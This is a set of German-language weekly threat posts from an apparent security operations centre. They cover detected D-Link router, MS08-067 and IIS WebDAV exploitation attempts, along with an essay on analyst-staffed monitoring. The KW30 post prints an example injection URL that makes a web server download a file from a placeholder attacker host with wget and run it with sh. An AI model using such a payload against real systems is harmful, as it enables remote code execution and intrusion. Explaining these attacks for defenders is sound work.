CSOC-Event der Woche KW30: Remote-Code-Ausführung auf Webseiten

KW30: CSOC-Event der Woche – Remote-Code-Ausführung


Durchschnittliche CSOC-Gesamtevents pro Tag
:     47.334
Detektionshäufigkeit Remote-Code-Ausführung auf Webseiten:      134

Eventbeschreibung Remote-Code-Ausführung auf Webseiten / Kritikalität = hoch (9 / 10)

In der vergangenen Woche konnten wir 134 Male den Versuch einer Remote-Code-Ausführung (auch: Remote-Code-Execution) auf Webseiten und -Portalen unserer HUB-Mitglieder feststellen. Eine Remote-Code-Ausführung beschreibt das Einschleusen und Ausführen von Codes auf fremden Systemen. In den meisten Fällen handelt es sich bei den Zielsystemen um Geräte oder Dienste, die über das Internet erreichbar sind und eine entsprechende Schwachstelle besitzen.

Die Exploits, mit denen in dieser Woche versucht wurde, den fremden Code auf das System zu schleusen, wandten sich hauptsächlich gegen Weboberflächen von Routern des Herstellers D-Link. Innerhalb des Frameworks Metasploit (Hacker-Tool) existieren entsprechende Exploits für mehrere Systeme von D-Link. Der neuste Exploit trägt dort die Bezeichnung dlink_dir850l_unauth_exec.  Auch wenn Sie keinen D-Link-Router im Einsatz haben sollten, dessen Weboberfläche direkt über das Internet zu erreichen ist, überprüfen Sie bitte regelmäßig die Softwareversion Ihrer öffentlich (aus dem Internet) erreichbaren Geräte.

Technische Beschreibung: Remote-Code-Ausführung auf Webseiten

Das Schema der versuchten Remote-Code-Ausführungs-Angriffe, die wir beobachten konnten, ist meist identisch. Dabei wird grundsätzlich versucht, Kommandozeilenbefehle an das Betriebssystem zu übergeben, welches die Webseite betreibt. So wird beispielsweise versucht, Befehle in die URL einzubetten und aufzurufen. Als Beispiel könnte aus der Ursprungs-URL der fiktiven Webseite http://fiktive-webseite.de/login.php plötzlich eine URL mit Schadcode werden. Bei erfolgreicher Ausführung des Schadcodes im folgenden Beispiel lädt das Zielsystem vom Angreifer-System eine Datei herunter (wget http://IP-des-Angreifers) und führt diese aus (sh /tmp/xd): http://fiktive-webseite.de/login.php?cli=aaaa%27;wget%20http://IP-des-Angreifers%20-O%20-%3F%20/tmp/xd;sh%20/tmp/xd%28 (Beispiel-URL)

CSOC-Event der Woche KW29: CVE-2008-4250

KW29: CSOC-Event der Woche - CVE-2008-4250


Durchschnittliche CSOC-Gesamtevents pro Tag
:     114.785
Detektionshäufigkeit CVE-2008-4250 / MS-08-067:      76

Eventbeschreibung CVE-2008-4250 / Kritikalität = hoch (10 / 10)

Im Laufe der vergangenen Woche haben wir innerhalb der Netzwerke unserer HUB-Mitglieder zwölfmal die Ausführung eines älteren Remote-Code-Execution-Exploits registriert. Dieser Exploit nutzt eine Schwachstelle im SMB-Protokoll aus und kann per Knopfdruck zu vollständiger Systemübernahme führen. Betroffen sind insbesondere die älteren Windowsbetriebssysteme XP, 2000 und Server 2003. Die Schwachstelle wurde im Jahr 2008 insbesondere durch den Wurm „Conficker“ bekannt und zeigt auf, wie wichtig ein konsistentes Patch-Management sowie der Einsatz moderner Betriebssysteme ist. Das passende Schadcode-Modul ist in Metasploit (Hacker-Tool) bekannt als „ms08_067_netapi“.

Technische Beschreibung: (CVE-2008-4250)

This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing.

Was unterscheidet ein SOC (Security Operations Center) von automatisierten Lösungen?

Was unterscheidet ein SOC (Security Operations Center) von automatisierten Lösungen?

In erster Linie geht es bei beiden Lösungsansätzen um die Detektion von Gefährdungen durch Cyberangriffe. Viele der in diesem Zusammenhang stehenden Faktoren können und werden durch aktuelle Sicherheitssysteme wie Firewalls, Endpoint-Lösungen und ATP-Systeme (Advanced Threat Protection) erkannt. Die Problematik liegt aber in den nahezu unbegrenzten Kombinationsmöglichkeiten verschiedenster Angriffsvektoren und in der Kreativität der Angreifer. Gerade wenn Social Engineering Teil eines Angriffes ist, versagen in vielen Fällen automatisierte Systeme. Auch solche mit „künstlicher Intelligenz“ sind hier in vielen Bereichen noch überfordert.

Aus diesem Grund setzt ein SOC bzw. CSOC (Cyber Security Operations Center) auf die Kombination von hochtechnisierten Lösungen und  der Erfahrung von Analysten. Rund 98% aller Meldungen können automatisiert abgearbeitet werden. Es bleiben also ca. 2% der Warnungen, die nicht automatisiert analysiert werden können.

2% – das klingt zunächst nicht nach besonders viel: Doch wenn man bedenkt, dass in einer durchschnittlichen Netzwerkinfrastruktur pro Tag ca. 1500 Meldungen – bestehend aus Regelverstößen, Bedrohungen und Verdachtsfällen – erzeugt werden, sind das ca. 30 Meldungen, die durch automatisierte Systeme nicht weiter betrachtet werden.

30 Meldungen, die außer Acht gelassen werden, stellen ein hohes Risiko für die gesamte Netzwerkinfrastruktur dar.

Prozentual ergibt sich eine Typ-Verteilung (Regelverstoß, Bedrohung, Verdachtsfall) von 50%-30%-20%. In Zahlen bedeutet das bei 30 Meldungen, dass 15 Regelverstöße, 9 Bedrohungen und 6 Verdachtsfälle nicht weiter betrachtet werden. Konzentriert man sich nun auf die 6 Verdachtsfälle, können nach einer manuellen Untersuchung durch einen Analysten ca. 4 bis 5 Meldungen mit einer hohen Wahrscheinlichkeit als „unkritisch“ eingestuft werden. Im Endergebnis wird eine Meldung pro Tag als „hoch kritisch“ eingestuft und ist somit Teil eines möglichen Cyberangriffes.

Das macht im Jahr ca. 365 Meldungen, die für Ihre Daten- und Systemverfügbarkeit kritisch sind.

Diese Meldungen werden im Rahmen einer festgelegten Eskalation in Zusammenarbeit mit den Analysten und den Kundenverantwortlichen weiter untersucht. Man muss sich darüber im Klaren sein, dass schon ein einziger, erfolgreicher Cyberangriff zur vollständigen Kompromittierung der Netzwerkinfrastruktur ausreicht.

Aktuelle Auswertungen und Statistiken zeigen, dass ein einmal in die Infrastruktur eingeschleuster Schadcode ca. 200 bis 300 Tage unbemerkt im Netzwerk verbleibt – trotz vorhandener professioneller automatisierter Schutzmechanismen. Eine hundertprozentige Sicherheit kann auch eine CSOC-Lösung nicht bieten. Es ist jedoch ein immer wichtiger werdender Baustein im Bereich Cyber Security und somit wichtig für den Schutz Ihrer Daten.

Ihr
Martin Graf

CSOC-Event der Woche KW28: Microsoft IIS Remote Code Execution

KW28: CSOC-Event der Woche - Microsoft IIS Remote Code Execution


Durchschnittliche CSOC-Gesamtevents pro Tag
:     67536
Detektionshäufigkeit CVE-2017-7269:      65 Events

Eventbeschreibung CVE-2017-7269 / Kritikalität = hoch (10 / 10)

Aktuell detektieren wir auffällig viele Events vom Typ „Microsoft IIS Remote Code Execution“. Dieses Angriffsszenario zeichnet sich durch ein Script aus, das bei seiner Ausführung in der Lage ist, eine Schwachstelle im Microsoft Internet Information Server IIS 6.0 auszunutzen. Ist der Angriff erfolgreich, kann es dem Angreifer gelingen, fremden Code auf dem Web-Server auszuführen. Es existiert ein passendes Schadcode-Modul (Microsoft IIS WebDav ScStoragePathFromUrl Overflow) im Metasploit Framework (Hacker-Tool). Bitte prüfen Sie, ob Ihr Web-Server auf dem aktuellen Stand ist oder ein Update erfordert!

Technische Beschreibung: (CVE-2017-7269)

Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with "If: <http://" in a PROPFIND request, as exploited in the wild in July or August 2016.